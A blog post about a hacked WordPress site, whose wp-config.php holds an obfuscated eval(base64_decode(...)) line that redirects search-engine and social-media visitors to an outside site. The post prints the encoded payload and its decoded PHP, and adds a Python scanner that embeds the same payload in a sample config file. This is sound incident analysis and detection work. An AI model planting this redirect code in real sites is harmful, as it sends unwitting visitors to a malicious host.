My Blog Got Hit With Malware

First of all, thanks to the Party, thanks to the people, and thanks to whoever planted the malware on me.

Opened the blog this evening and Chrome showed this:

Tragedy 1

OK, so I'd been hit: the warning said the site contained malware. I clicked the link to the safe-browsing diagnostic page and then dug around in Google Webmaster Tools, which said malware had been detected on 2/23. So I opened FTP, went through the blog's files, and looked for anything modified on 2/23. Nothing. Then I looked at files modified on the 24th: only .htaccess and sitemap.xml, and both checked out fine.

orz. So I kept going on Baidu, searched all over, downloaded the theme and everything else to check, and went through iframes, js and so on in detail, but still couldn't find anything wrong.

At that point I took the site Google's warning named as malicious and searched for it on Google. After opening dozens of pages I suddenly found this blog. Thanks, brother; otherwise I'd never have thought that wp-config.php could be the file that was infected.

I opened wp-config.php and, sure enough, there was a big, conspicuous chunk of eval code. Here it is:

eval(base64_decode("DQplcnJvcl9yZXBvcnRpbmcoMCk7DQokcWF6cGxtPWhlYWRlcnNfc2VudCgpOw0KaWYgKCEkcWF6cGxtKXsNCiRyZWZlcmVyPSRfU0VSVkVSWydIVFRQX1JFRkVSRVInXTsNCiR1YWc9JF9TRVJWRVJbJ0hUVFBfVVNFUl9BR0VOVCddOw0KaWYgKCR1YWcpIHsNCmlmIChzdHJpc3RyKCRyZWZlcmVyLCJ5YWhvbyIpIG9yIHN0cmlzdHIoJHJlZmVyZXIsImJpbmciKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJyYW1ibGVyIikgb3Igc3RyaXN0cigkcmVmZXJlciwiZ29nbyIpIG9yIHN0cmlzdHIoJHJlZmVyZXIsImxpdmUuY29tIilvciBzdHJpc3RyKCRyZWZlcmVyLCJhcG9ydCIpIG9yIHN0cmlzdHIoJHJlZmVyZXIsIm5pZ21hIikgb3Igc3RyaXN0cigkcmVmZXJlciwid2ViYWx0YSIpIG9yIHN0cmlzdHIoJHJlZmVyZXIsImJlZ3VuLnJ1Iikgb3Igc3RyaXN0cigkcmVmZXJlciwic3R1bWJsZXVwb24uY29tIikgb3Igc3RyaXN0cigkcmVmZXJlciwiYml0Lmx5Iikgb3Igc3RyaXN0cigkcmVmZXJlciwidGlueXVybC5jb20iKSBvciBwcmVnX21hdGNoKCIveWFuZGV4XC5ydVwveWFuZHNlYXJjaFw/KC4qPylcJmxyXD0vIiwkcmVmZXJlcikgb3IgcHJlZ19tYXRjaCAoIi9nb29nbGVcLiguKj8pXC91cmwvIiwkcmVmZXJlcikgb3Igc3RyaXN0cigkcmVmZXJlciwibXlzcGFjZS5jb20iKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJmYWNlYm9vay5jb20iKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJhb2wuY29tIikpIHsNCmlmICghc3RyaXN0cigkcmVmZXJlciwiY2FjaGUiKSBvciAhc3RyaXN0cigkcmVmZXJlciwiaW51cmwiKSl7DQpoZWFkZXIoIkxvY2F0aW9uOiBodHRwOi8vZnJvbGluZy5iZWUucGwvIik7DQpleGl0KCk7DQp9DQp9DQp9DQp9"));

After decoding:

error_reporting(0); // hide any PHP warnings so nothing shows up in the page
$qazplm=headers_sent();
if (!$qazplm){
    $referer=$_SERVER['HTTP_REFERER'];
    $uag=$_SERVER['HTTP_USER_AGENT'];
    if ($uag) {
        // only visitors arriving from these search engines / social sites are affected,
        // so the site owner, who types the URL directly, never sees the redirect
        if (stristr($referer,"yahoo") or stristr($referer,"bing") or stristr($referer,"rambler") or stristr($referer,"gogo") or stristr($referer,"live.com") or stristr($referer,"aport") or stristr($referer,"nigma") or stristr($referer,"webalta") or stristr($referer,"begun.ru") or stristr($referer,"stumbleupon.com") or stristr($referer,"bit.ly") or stristr($referer,"tinyurl.com") or preg_match("/yandex\.ru\/yandsearch\?(.*?)\&lr\=/",$referer) or preg_match("/google\.(.*?)\/url/",$referer) or stristr($referer,"myspace.com") or stristr($referer,"facebook.com") or stristr($referer,"aol.com")) {
            // skip referers that mention "cache" or "inurl"
            if (!stristr($referer,"cache") or !stristr($referer,"inurl")){
                header("Location: http://froling.bee.pl/");
                exit();
            }
        }
    }
}
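To turn this payload into something a defender can reuse, here is an added Python example (my own code, not the author's and not part of the post): it finds eval(base64_decode("...")) in PHP files, decodes the blob, and flags the three traits visible in the decoded code above (error_reporting(0), a check of $_SERVER['HTTP_REFERER'], and a header("Location: ...") redirect), reporting the target URL and the file's modification time. The wp-config.php it scans is constructed around the base64 string from this post; the function names, the INDICATORS table and the sample define() line are my own.

```python
import base64
import re
from datetime import datetime, timezone
from pathlib import Path

# Matches the classic one-liner eval(base64_decode("...")), tolerating whitespace
# and a base64 string that was wrapped across several lines.
EVAL_B64_RE = re.compile(
    r'''eval\s*\(\s*base64_decode\s*\(\s*['"]([A-Za-z0-9+/=\s]+)['"]\s*\)\s*\)'''
)

# Traits of the decoded payload that mark a referrer-based redirect
# (the names are mine, not from any scanner product).
INDICATORS = {
    "silences_errors": re.compile(r"error_reporting\s*\(\s*0\s*\)"),
    "checks_referer": re.compile(r'''\$_SERVER\s*\[\s*['"]HTTP_REFERER['"]\s*\]'''),
    "redirects": re.compile(r'''header\s*\(\s*['"]Location:\s*(https?://[^'"]+)''', re.I),
}


def decode_payload(b64: str) -> str:
    """Decode a base64 blob, discarding any line-wrapping whitespace first."""
    cleaned = re.sub(r"\s+", "", b64)
    return base64.b64decode(cleaned).decode("utf-8", errors="replace")


def analyse_source(src: str) -> list[dict]:
    """Return one finding per eval(base64_decode(...)) in a PHP source string."""
    findings = []
    for m in EVAL_B64_RE.finditer(src):
        payload = decode_payload(m.group(1))
        redirect = INDICATORS["redirects"].search(payload)
        findings.append({
            "offset": m.start(),
            "payload": payload,
            "indicators": {name: bool(rx.search(payload)) for name, rx in INDICATORS.items()},
            "redirect_target": redirect.group(1) if redirect else None,
        })
    return findings


def scan_tree(root: Path) -> dict[str, list[dict]]:
    """Scan every .php file under root. The mtime is reported because, as the post
    shows, the infected file can be weeks older than the date the site got flagged."""
    results = {}
    for path in root.rglob("*.php"):
        try:
            src = path.read_text(encoding="utf-8", errors="replace")
        except OSError:
            continue
        found = analyse_source(src)
        if found:
            mtime = datetime.fromtimestamp(path.stat().st_mtime, tz=timezone.utc)
            for f in found:
                f["mtime"] = mtime.isoformat()
            results[str(path)] = found
    return results


# Constructed sample: a minimal wp-config.php carrying the blog post's payload.
_PAYLOAD_B64 = (
    "DQplcnJvcl9yZXBvcnRpbmcoMCk7DQokcWF6cGxtPWhlYWRlcnNfc2VudCgpOw0KaWYgKC"
    "EkcWF6cGxtKXsNCiRyZWZlcmVyPSRfU0VSVkVSWydIVFRQX1JFRkVSRVInXTsNCiR1YWc9JF9"
    "TRVJWRVJbJ0hUVFBfVVNFUl9BR0VOVCddOw0KaWYgKCR1YWcpIHsNCmlmIChzdHJpc3RyK"
    "CRyZWZlcmVyLCJ5YWhvbyIpIG9yIHN0cmlzdHIoJHJlZmVyZXIsImJpbmciKSBvciBzdHJpc3RyK"
    "CRyZWZlcmVyLCJyYW1ibGVyIikgb3Igc3RyaXN0cigkcmVmZXJlciwiZ29nbyIpIG9yIHN0cmlzd"
    "HIoJHJlZmVyZXIsImxpdmUuY29tIilvciBzdHJpc3RyKCRyZWZlcmVyLCJhcG9ydCIpIG9yIHN0"
    "cmlzdHIoJHJlZmVyZXIsIm5pZ21hIikgb3Igc3RyaXN0cigkcmVmZXJlciwid2ViYWx0YSIpIG9yIH"
    "N0cmlzdHIoJHJlZmVyZXIsImJlZ3VuLnJ1Iikgb3Igc3RyaXN0cigkcmVmZXJlciwic3R1bWJsZXVw"
    "b24uY29tIikgb3Igc3RyaXN0cigkcmVmZXJlciwiYml0Lmx5Iikgb3Igc3RyaXN0cigkcmVmZXJlci"
    "widGlueXVybC5jb20iKSBvciBwcmVnX21hdGNoKCIveWFuZGV4XC5ydVwveWFuZHNlYXJjaFw"
    "/KC4qPylcJmxyXD0vIiwkcmVmZXJlcikgb3IgcHJlZ19tYXRjaCAoIi9nb29nbGVcLiguKj8pXC91cm"
    "wvIiwkcmVmZXJlcikgb3Igc3RyaXN0cigkcmVmZXJlciwibXlzcGFjZS5jb20iKSBvciBzdHJpc3RyKC"
    "RyZWZlcmVyLCJmYWNlYm9vay5jb20iKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJhb2wuY29tIikpI"
    "HsNCmlmICghc3RyaXN0cigkcmVmZXJlciwiY2FjaGUiKSBvciAhc3RyaXN0cigkcmVmZXJlciwiaW"
    "51cmwiKSl7DQpoZWFkZXIoIkxvY2F0aW9uOiBodHRwOi8vZnJvbGluZy5iZWUucGwvIik7DQple"
    "Gl0KCk7DQp9DQp9DQp9DQp9"
)
SAMPLE_WP_CONFIG = (
    "<?php\n"
    + "define('DB_NAME', 'example_db');\n"  # constructed placeholder, not a real config
    + 'eval(base64_decode("' + _PAYLOAD_B64 + '"));\n'
    + "require_once ABSPATH . 'wp-settings.php';\n"
)

if __name__ == "__main__":
    for f in analyse_source(SAMPLE_WP_CONFIG):
        print(f"eval(base64_decode) at offset {f['offset']}: "
              f"redirect -> {f['redirect_target']}, indicators {f['indicators']}")
```

Run it as a script to analyse the embedded sample, or call scan_tree(Path("/path/to/wordpress")) on a copy of the site. Looking for the eval(base64_decode pattern itself, rather than for iframes or for files changed on a particular day, is what catches this case: the string is opaque to a grep for "iframe" or "js", and the file's mtime (2/14 here) fell outside the dates the Google report pointed to.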

 

And there it was, that conspicuous site. fuck the website!

Finally I checked the modification time of my wp-config.php: 2/14. In other words it had been infected long before; Google only just detected it!!!!

So I checked the other blog on the same shared host, and, tragically, it had been hit even earlier, on 1/30....

While sorting this out I went through a lot of sites. To sum up:

http://www.zhanggang.net/wap/index-wap2.php?p=40250

http://www.stopbadware.org/home/security

Posted by Tanky Woo [homepage: https://tankywoo.com] / [new blog: https://blog.tankywoo.com]
